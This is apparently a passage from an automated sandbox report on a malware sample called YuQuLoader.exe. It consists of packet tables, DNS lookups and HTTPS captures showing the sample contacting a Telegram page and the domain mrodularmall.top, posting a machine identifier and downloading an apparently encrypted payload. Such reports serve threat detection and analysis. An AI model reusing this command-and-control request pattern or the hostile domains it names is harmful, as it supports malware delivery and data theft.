                                                                                    Mar 11, 2025 17:23:25.782521963 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:25.782579899 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:25.782654047 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:25.783725023 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:25.783746004 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:27.701277018 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:27.701361895 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:27.706115961 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:27.706129074 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:27.706442118 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:27.755270004 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:27.800327063 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386714935 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386737108 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386743069 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386806011 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386807919 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:28.386861086 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386883020 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:28.386899948 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.386909962 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:28.386945009 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:28.389601946 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:28.389620066 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.389636040 CET49711443192.168.2.5149.154.167.99
                                                                                    Mar 11, 2025 17:23:28.389642954 CET44349711149.154.167.99192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.433820009 CET49713443192.168.2.5104.21.93.43
                                                                                    Mar 11, 2025 17:23:28.433847904 CET44349713104.21.93.43192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.433918953 CET49713443192.168.2.5104.21.93.43
                                                                                    Mar 11, 2025 17:23:28.434350014 CET49713443192.168.2.5104.21.93.43
                                                                                    Mar 11, 2025 17:23:28.434361935 CET44349713104.21.93.43192.168.2.5
                                                                                    Mar 11, 2025 17:23:29.701106071 CET49713443192.168.2.5104.21.93.43
                                                                                    Mar 11, 2025 17:23:30.211321115 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:30.211361885 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:30.211458921 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:30.211831093 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:30.211848974 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.032643080 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.032769918 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.034976959 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.034987926 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.035319090 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.037779093 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.037820101 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.037852049 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.954420090 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.954555988 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.954611063 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.954633951 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.968802929 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.968867064 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.968884945 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.968985081 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.969053030 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.969063997 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.984644890 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:32.984724045 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:32.984740973 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.003328085 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.003387928 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.003401041 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.022020102 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.022102118 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.028111935 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.028111935 CET49714443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.028139114 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.028150082 CET44349714104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.824928999 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.825010061 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:33.825109005 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.825424910 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:33.825438023 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:35.627438068 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:35.627518892 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:35.629232883 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:35.629249096 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:35.629502058 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:35.634213924 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:35.634367943 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:35.634399891 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:35.634454012 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:35.680327892 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:36.493974924 CET44349716104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:36.495065928 CET49716443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:36.642456055 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:36.642504930 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:36.642579079 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:36.643083096 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:36.643095970 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:38.809175014 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:38.809453011 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:38.811096907 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:38.811117887 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:38.811445951 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:38.812613964 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:38.812733889 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:38.812768936 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:38.812822104 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:38.860322952 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:39.675210953 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:39.675297022 CET44349717104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:39.675340891 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:39.675549030 CET49717443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:39.892760992 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:39.892806053 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:39.892884016 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:39.893187046 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:39.893202066 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:41.948431015 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:41.948508024 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:41.949759007 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:41.949769974 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:41.950198889 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:41.951541901 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:41.952100039 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:41.952137947 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:41.952264071 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:41.952274084 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:43.070910931 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:43.071048975 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:43.071175098 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:43.071300030 CET49718443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:43.071326971 CET44349718104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:44.260330915 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:44.260366917 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:44.260456085 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:44.261109114 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:44.261121035 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:46.175775051 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:46.175894022 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:46.177139044 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:46.177151918 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:46.177442074 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:46.178792953 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:46.179013014 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:46.179033041 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:47.172838926 CET44349721104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:47.173052073 CET49721443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:47.789632082 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:47.789685965 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:47.789764881 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:47.790086985 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:47.790107012 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.894334078 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.894407034 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.895978928 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.895993948 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.896255970 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.904831886 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.905586004 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.905617952 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.905738115 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.905766010 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.905880928 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.905913115 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.906506062 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.906534910 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.906668901 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.906708002 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.906852961 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.906881094 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.906898022 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.906925917 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907038927 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907058954 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907085896 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907102108 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907278061 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907300949 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907325983 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907361031 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907370090 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907386065 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907397032 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907418013 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907422066 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907461882 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:49.907507896 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:49.907524109 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:53.418656111 CET44349723104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:53.418876886 CET49723443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:53.560758114 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:53.560801983 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:53.560883999 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:53.561254025 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:53.561263084 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:55.565654039 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:55.565779924 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:55.567126036 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:55.567142963 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:55.567405939 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:55.568536043 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:55.568536043 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:55.568589926 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.443999052 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.444037914 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.444091082 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.444107056 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.456481934 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.456621885 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.456634998 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.459793091 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.459824085 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.459893942 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.459909916 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.460302114 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.468755960 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.468842030 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.468887091 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.468991995 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.468991995 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.469007015 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.469017029 CET44349725104.21.112.1192.168.2.5

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 11, 2025 17:23:25.769445896 CET6217253192.168.2.51.1.1.1
                                                                                    Mar 11, 2025 17:23:25.776082039 CET53621721.1.1.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.413283110 CET5705053192.168.2.51.1.1.1
                                                                                    Mar 11, 2025 17:23:28.422256947 CET53570501.1.1.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:28.424058914 CET5339553192.168.2.51.1.1.1
                                                                                    Mar 11, 2025 17:23:28.433151007 CET53533951.1.1.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:29.703444004 CET5718753192.168.2.51.1.1.1
                                                                                    Mar 11, 2025 17:23:30.210114002 CET53571871.1.1.1192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 11, 2025 17:23:25.769445896 CET192.168.2.51.1.1.10x6236Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:28.413283110 CET192.168.2.51.1.1.10xff5bStandard query (0)astralconnec.icuA (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:28.424058914 CET192.168.2.51.1.1.10x4f03Standard query (0)featureccus.shopA (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:29.703444004 CET192.168.2.51.1.1.10x901bStandard query (0)mrodularmall.topA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 11, 2025 17:23:25.776082039 CET1.1.1.1192.168.2.50x6236No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:28.422256947 CET1.1.1.1192.168.2.50xff5bName error (3)astralconnec.icunonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:28.433151007 CET1.1.1.1192.168.2.50x4f03No error (0)featureccus.shop104.21.93.43A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:28.433151007 CET1.1.1.1192.168.2.50x4f03No error (0)featureccus.shop172.67.204.104A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Mar 11, 2025 17:23:30.210114002 CET1.1.1.1192.168.2.50x901bNo error (0)mrodularmall.top104.21.80.1A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • t.me
                                                                                    • mrodularmall.top

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549711149.154.167.994438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:27 UTC61OUTGET /asdawfq HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Host: t.me
                                                                                    2025-03-11 16:23:28 UTC512INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Tue, 11 Mar 2025 16:23:28 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 12333
                                                                                    Connection: close
                                                                                    Set-Cookie: stel_ssid=3d938ea1e907c113ce_14650810596568096819; expires=Wed, 12 Mar 2025 16:23:28 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                    Pragma: no-cache
                                                                                    Cache-control: no-store
                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                    2025-03-11 16:23:28 UTC12333INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 64 61 77 66 71 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549714104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:32 UTC265OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 65
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:32 UTC65OUTData Raw: 75 69 64 3d 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 26 63 69 64 3d
                                                                                    Data Ascii: uid=71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4&cid=
                                                                                    2025-03-11 16:23:32 UTC795INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:32 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 14134
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CN09br7jttek1XZiAaXlvXKhsYUfdGk%2FGy%2BMjyYNyQ4KbSR%2Fdl2Sr%2B3w%2FQjkNKC5w%2F%2Bj%2F3QroTsFC%2FpvkZqWfyg2daZZe3Kpj90LQSOXGIc55n09Sbqz6pym3h9uTWwi7j%2BH"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec659afa1f4f77-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=41495&min_rtt=34226&rtt_var=22226&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=966&delivery_rate=44387&cwnd=32&unsent_bytes=0&cid=bbb519fb23cfbc9b&ts=926&x=0"
                                                                                    2025-03-11 16:23:32 UTC574INData Raw: e5 ad 19 f4 a3 71 a5 54 b9 c4 63 fc fa 82 fd c8 73 2f da e2 b9 b5 ef 73 ba e2 bb 16 f9 90 53 02 4b 33 c3 c6 3f 66 fb 12 45 8c e4 05 4a 93 f1 03 1c bd 0d c5 63 b0 5d fc 91 8d db a3 b4 b5 2d 35 89 4b 7b c5 c2 f3 9d 93 2f b8 65 12 ff f0 9e 0a ad 72 4b 6c a9 1c 50 13 9f 5f a8 38 4c ac e9 83 6c 0b 42 eb 05 90 37 7f 02 57 f5 ba fb 42 c6 61 dc 8a b1 cd b6 a5 c5 09 24 3c e4 45 c4 0d b0 54 f3 a1 17 8f 53 a8 1a ac 14 d8 d1 5d f9 32 86 3c 45 fc 53 35 db f8 e8 a9 c0 0d d2 5b 60 0e 4b 3a 00 7f f2 f4 de c1 1d 3b 34 95 e2 d8 d6 5e 1a ea ae fb 67 e5 11 2f 2e 2b e3 ae 63 dd 02 42 77 80 f2 e8 17 d4 a6 42 d2 33 2c e5 dd d8 06 9d eb 7b 7c a1 43 e6 d4 04 00 ca 97 49 cc 91 70 db eb 92 dd b4 27 ef e0 fa 39 7e b5 57 c1 e8 44 0c 2e be 52 2a 14 47 92 e2 6e 79 34 70 14 8b 12 4e 59
                                                                                    Data Ascii: qTcs/sSK3?fEJc]-5K{/erKlP_8LlB7WBa$<ETS]2<ES5[`K:;4^g/.+cBwB3,{|CIp'9~WD.R*Gny4pNY
